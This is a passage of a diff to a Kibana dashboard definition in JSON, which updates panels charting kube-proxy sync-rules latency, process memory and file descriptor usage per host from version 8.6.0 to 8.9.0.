"kubernetes.proxy.sync.rules.duration.us.count: *" - }, - "isBucketed": false, - "label": "Part of last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.sync.rules.duration.us.count" - }, - "9203a269-fdcb-4598-859d-d73f8c9734e0X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: 
*')/1000000", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "9203a269-fdcb-4598-859d-d73f8c9734e0X0", - "9203a269-fdcb-4598-859d-d73f8c9734e0X1" - ], - "name": "divide", - "type": "function" - }, - 1000000 - ], - "location": { - "max": 231, - "min": 0 - }, - "name": "divide", - "text": "last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", - "type": "function" - } - }, - "references": [ - "9203a269-fdcb-4598-859d-d73f8c9734e0X0", - "9203a269-fdcb-4598-859d-d73f8c9734e0X1" - ], - "scale": "ratio" - }, - "9ce45236-05a8-478a-a1e1-85ccd013786c": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "c159c217-ff39-456c-ae61-593bb727a2df": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "f80bbb4a-6177-4118-9483-7f58928032d4": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - 
"axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "9203a269-fdcb-4598-859d-d73f8c9734e0" - ], - "layerId": "0b5eadf5-2a9c-49a2-b862-d317822adfd8", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "9ce45236-05a8-478a-a1e1-85ccd013786c", - "xAccessor": "c159c217-ff39-456c-ae61-593bb727a2df" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "34de2f11-faf2-49e8-aada-98c2cd5eb266", - "w": 24, - "x": 24, - "y": 7 + "layers": [ + { + "accessors": [ + "a436f8a7-433c-4b20-b115-717f4da445cb" + ], + "layerId": "5de1942f-e0a5-4ed8-86c0-972d57d62085", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "f80bbb4a-6177-4118-9483-7f58928032d4", + "xAccessor": "8cb92e23-1df9-41ca-8061-ad76616f76c7" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "34de2f11-faf2-49e8-aada-98c2cd5eb266", - "title": "Average SyncProxyRules latency ", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + 
"xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Average network programming latency" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "34de2f11-faf2-49e8-aada-98c2cd5eb266", + "w": 24, + "x": 24, + "y": 7 + }, + "panelIndex": "34de2f11-faf2-49e8-aada-98c2cd5eb266", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0b5eadf5-2a9c-49a2-b862-d317822adfd8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0b5eadf5-2a9c-49a2-b862-d317822adfd8": { + "columnOrder": [ + "9ce45236-05a8-478a-a1e1-85ccd013786c", + "c159c217-ff39-456c-ae61-593bb727a2df", + "9203a269-fdcb-4598-859d-d73f8c9734e0", + "9203a269-fdcb-4598-859d-d73f8c9734e0X0", + "9203a269-fdcb-4598-859d-d73f8c9734e0X2", + "9203a269-fdcb-4598-859d-d73f8c9734e0X1" + ], + "columns": { + "9203a269-fdcb-4598-859d-d73f8c9734e0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Average latency", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": "s" + } + }, + "formula": "last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", + "isFormulaBroken": false + }, + "references": [ + "9203a269-fdcb-4598-859d-d73f8c9734e0X2" + ], + "scale": "ratio" + }, + "9203a269-fdcb-4598-859d-d73f8c9734e0X0": { + "customLabel": 
true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.sync.rules.duration.us.sum: *" + }, + "isBucketed": false, + "label": "Part of last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.sync.rules.duration.us.sum" + }, + "9203a269-fdcb-4598-859d-d73f8c9734e0X1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.sync.rules.duration.us.count: *" + }, + "isBucketed": false, + "label": "Part of last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.sync.rules.duration.us.count" }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(239,249,218,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "Process", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none 
!important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ + "9203a269-fdcb-4598-859d-d73f8c9734e0X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true + "args": [ + "9203a269-fdcb-4598-859d-d73f8c9734e0X0", + "9203a269-fdcb-4598-859d-d73f8c9734e0X1" + ], + "name": "divide", + "type": "function" + }, + 1000000 + ], + "location": { + "max": 231, + "min": 0 + }, + "name": "divide", + "text": "last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", + "type": "function" + } + }, + "references": [ + "9203a269-fdcb-4598-859d-d73f8c9734e0X0", + "9203a269-fdcb-4598-859d-d73f8c9734e0X1" + ], + "scale": "ratio" + }, + "9ce45236-05a8-478a-a1e1-85ccd013786c": { + "dataType": "string", + 
"isBucketed": true, + "label": "Top 10 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.name" }, - "title": "", - "type": "metrics", - "uiState": {} + "c159c217-ff39-456c-ae61-593bb727a2df": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 3, - "i": "c3fee68f-01c6-49da-a759-2900b1cd15bf", - "w": 48, - "x": 0, - "y": 21 + "layers": [ + { + "accessors": [ + "9203a269-fdcb-4598-859d-d73f8c9734e0" + ], + "layerId": "0b5eadf5-2a9c-49a2-b862-d317822adfd8", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "9ce45236-05a8-478a-a1e1-85ccd013786c", + "xAccessor": "c159c217-ff39-456c-ae61-593bb727a2df" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "c3fee68f-01c6-49da-a759-2900b1cd15bf", - "title": "", - "type": "visualization", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", - "type": "index-pattern" - }, - { - "id": 
"metrics-*", - "name": "169f9d33-cf55-422e-906e-f4eecb26a362", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807": { - "columnOrder": [ - "6cbab896-ee42-4dad-8831-12f53cda0d6d", - "910bd079-4852-48bd-9d7a-e5eb940f0838", - "ee812faf-6f3c-4cc2-ad9a-27136340ef39", - "96c80749-da61-425a-b637-878d33e410fd", - "96c80749-da61-425a-b637-878d33e410fdX0", - "96c80749-da61-425a-b637-878d33e410fdX2", - "96c80749-da61-425a-b637-878d33e410fdX1", - "910bd079-4852-48bd-9d7a-e5eb940f0838X0", - "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0" - ], - "columns": { - "6cbab896-ee42-4dad-8831-12f53cda0d6d": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Host", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "910bd079-4852-48bd-9d7a-e5eb940f0838": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Resident memory", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "formula": "last_value(kubernetes.proxy.process.memory.resident.bytes, kql='kubernetes.proxy.process.memory.resident.bytes: *')", - "isFormulaBroken": false - }, - "references": [ - "910bd079-4852-48bd-9d7a-e5eb940f0838X0" - ], - "scale": "ratio" - }, - "910bd079-4852-48bd-9d7a-e5eb940f0838X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.process.memory.resident.bytes: *" - }, - "isBucketed": false, - "label": "Part of Resident memory", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": 
"kubernetes.proxy.process.memory.resident.bytes" - }, - "96c80749-da61-425a-b637-878d33e410fd": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Open file descriptors usage", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 1 - } - }, - "formula": "last_value(kubernetes.proxy.process.fds.open.count)/last_value(kubernetes.proxy.process.fds.max.count)*100", - "isFormulaBroken": false - }, - "references": [ - "96c80749-da61-425a-b637-878d33e410fdX2" - ], - "scale": "ratio" - }, - "96c80749-da61-425a-b637-878d33e410fdX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.process.fds.open.count: *" - }, - "isBucketed": false, - "label": "Part of Open file descriptors usage", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.process.fds.open.count" - }, - "96c80749-da61-425a-b637-878d33e410fdX1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.process.fds.max.count: *" - }, - "isBucketed": false, - "label": "Part of Open file descriptors usage", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.process.fds.max.count" - }, - "96c80749-da61-425a-b637-878d33e410fdX2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Open file descriptors usage", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "96c80749-da61-425a-b637-878d33e410fdX0", - "96c80749-da61-425a-b637-878d33e410fdX1" - ], - "name": "divide", - "type": "function" - }, - 100 - ], - "location": { - "max": 106, - "min": 0 - }, - "name": "multiply", - "text": 
"last_value(kubernetes.proxy.process.fds.open.count)/last_value(kubernetes.proxy.process.fds.max.count)*100", - "type": "function" - } - }, - "references": [ - "96c80749-da61-425a-b637-878d33e410fdX0", - "96c80749-da61-425a-b637-878d33e410fdX1" - ], - "scale": "ratio" - }, - "ee812faf-6f3c-4cc2-ad9a-27136340ef39": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Virtual memory", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "formula": "last_value(kubernetes.proxy.process.memory.virtual.bytes, kql='kubernetes.proxy.process.memory.virtual.bytes: *')", - "isFormulaBroken": false - }, - "references": [ - "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0" - ], - "scale": "ratio" - }, - "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.process.memory.virtual.bytes: *" - }, - "isBucketed": false, - "label": "Part of Virtual memory", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.process.memory.virtual.bytes" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Average SyncProxyRules latency " + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "c3fee68f-01c6-49da-a759-2900b1cd15bf", + "w": 48, + "x": 0, + "y": 21 + }, + "panelIndex": "c3fee68f-01c6-49da-a759-2900b1cd15bf", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + 
"background_color": "rgba(239,249,218,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "Process", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ + { + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" + }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "af47c34c-961a-463c-9d66-ffedcc2eef12", + "w": 24, + "x": 0, + "y": 24 + }, + "panelIndex": "af47c34c-961a-463c-9d66-ffedcc2eef12", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", + "type": 
"index-pattern" + }, + { + "id": "metrics-*", + "name": "169f9d33-cf55-422e-906e-f4eecb26a362", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807": { + "columnOrder": [ + "6cbab896-ee42-4dad-8831-12f53cda0d6d", + "910bd079-4852-48bd-9d7a-e5eb940f0838", + "ee812faf-6f3c-4cc2-ad9a-27136340ef39", + "96c80749-da61-425a-b637-878d33e410fd", + "96c80749-da61-425a-b637-878d33e410fdX0", + "96c80749-da61-425a-b637-878d33e410fdX2", + "96c80749-da61-425a-b637-878d33e410fdX1", + "910bd079-4852-48bd-9d7a-e5eb940f0838X0", + "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0" + ], + "columns": { + "6cbab896-ee42-4dad-8831-12f53cda0d6d": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "169f9d33-cf55-422e-906e-f4eecb26a362", - "key": "kubernetes.proxy.process.fds.open.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.proxy.process.fds.open.count" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "alignment": "center", - "columnId": "6cbab896-ee42-4dad-8831-12f53cda0d6d" - }, - { - "alignment": "center", - "columnId": "910bd079-4852-48bd-9d7a-e5eb940f0838" - }, - { - "alignment": "center", - "columnId": "ee812faf-6f3c-4cc2-ad9a-27136340ef39", - "isTransposed": false - }, - { - "alignment": "center", - "colorMode": "text", - "columnId": "96c80749-da61-425a-b637-878d33e410fd", - "isTransposed": false, - "palette": { - "name": "custom", - "params": { 
- "colorStops": [ - { - "color": "#54B399", - "stop": 0 - }, - { - "color": "#D6BF57", - "stop": 60 - }, - { - "color": "#E7664C", - "stop": 90 - } - ], - "continuity": "above", - "name": "custom", - "rangeMax": null, - "rangeMin": 0, - "rangeType": "number", - "steps": 5, - "stops": [ - { - "color": "#54B399", - "stop": 60 - }, - { - "color": "#D6BF57", - "stop": 90 - }, - { - "color": "#E7664C", - "stop": 91 - } - ] - }, - "type": "palette" - } - } - ], - "layerId": "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", - "layerType": "data" - } + "size": 5 + }, + "scale": "ordinal", + "sourceField": "host.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 9, - "i": "af47c34c-961a-463c-9d66-ffedcc2eef12", - "w": 24, - "x": 0, - "y": 24 - }, - "panelIndex": "af47c34c-961a-463c-9d66-ffedcc2eef12", - "title": "Proxy process data ", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "77da5988-3f03-4e8f-b1e4-39a94d8bec07": { - "columnOrder": [ - "7e1756d9-af1b-4204-a8d4-8c57987216f0", - "d523e6d2-50f3-4b45-8815-8259df43850c", - "cf481e4f-b568-4306-8da9-5e3d516ccbea", - "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" - ], - "columns": { - "7e1756d9-af1b-4204-a8d4-8c57987216f0": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - 
"cf481e4f-b568-4306-8da9-5e3d516ccbea": { - "dataType": "number", - "isBucketed": false, - "label": "average(kubernetes.proxy.process.memory.resident.bytes)", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - }, - "formula": "average(kubernetes.proxy.process.memory.resident.bytes)", - "isFormulaBroken": false - }, - "references": [ - "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" - ], - "scale": "ratio" - }, - "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of average(kubernetes.proxy.process.memory.resident.bytes)", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.process.memory.resident.bytes" - }, - "d523e6d2-50f3-4b45-8815-8259df43850c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "910bd079-4852-48bd-9d7a-e5eb940f0838": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Resident memory", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "formula": "last_value(kubernetes.proxy.process.memory.resident.bytes, kql='kubernetes.proxy.process.memory.resident.bytes: *')", + "isFormulaBroken": false + }, + "references": [ + "910bd079-4852-48bd-9d7a-e5eb940f0838X0" + ], + "scale": "ratio" + }, + "910bd079-4852-48bd-9d7a-e5eb940f0838X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.process.memory.resident.bytes: *" + }, + "isBucketed": false, + 
"label": "Part of Resident memory", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.process.memory.resident.bytes" + }, + "96c80749-da61-425a-b637-878d33e410fd": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Open file descriptors usage", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 1 + } }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0.3, - "layers": [ - { - "accessors": [ - "cf481e4f-b568-4306-8da9-5e3d516ccbea" - ], - "layerId": "77da5988-3f03-4e8f-b1e4-39a94d8bec07", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "7e1756d9-af1b-4204-a8d4-8c57987216f0", - "xAccessor": "d523e6d2-50f3-4b45-8815-8259df43850c", - "yConfig": [] - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false + "formula": "last_value(kubernetes.proxy.process.fds.open.count)/last_value(kubernetes.proxy.process.fds.max.count)*100", + "isFormulaBroken": false + }, + "references": [ + "96c80749-da61-425a-b637-878d33e410fdX2" + ], + "scale": "ratio" + }, + "96c80749-da61-425a-b637-878d33e410fdX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.process.fds.open.count: *" + }, + "isBucketed": false, + "label": "Part of Open file descriptors usage", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.process.fds.open.count" + }, + "96c80749-da61-425a-b637-878d33e410fdX1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": 
"kubernetes.proxy.process.fds.max.count: *" + }, + "isBucketed": false, + "label": "Part of Open file descriptors usage", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.process.fds.max.count" + }, + "96c80749-da61-425a-b637-878d33e410fdX2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Open file descriptors usage", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + "96c80749-da61-425a-b637-878d33e410fdX0", + "96c80749-da61-425a-b637-878d33e410fdX1" + ], + "name": "divide", + "type": "function" }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": false, - "xTitle": "", - "yTitle": "" + 100 + ], + "location": { + "max": 106, + "min": 0 + }, + "name": "multiply", + "text": "last_value(kubernetes.proxy.process.fds.open.count)/last_value(kubernetes.proxy.process.fds.max.count)*100", + "type": "function" } + }, + "references": [ + "96c80749-da61-425a-b637-878d33e410fdX0", + "96c80749-da61-425a-b637-878d33e410fdX1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 21, - "i": "303702e1-ba33-49f2-b337-4cc7d7305606", - "w": 24, - "x": 24, - "y": 24 - }, - "panelIndex": "303702e1-ba33-49f2-b337-4cc7d7305606", - "title": "Average resident memory ", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", - "type": "index-pattern" - } + "ee812faf-6f3c-4cc2-ad9a-27136340ef39": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Virtual memory", + "operationType": "formula", + "params": { 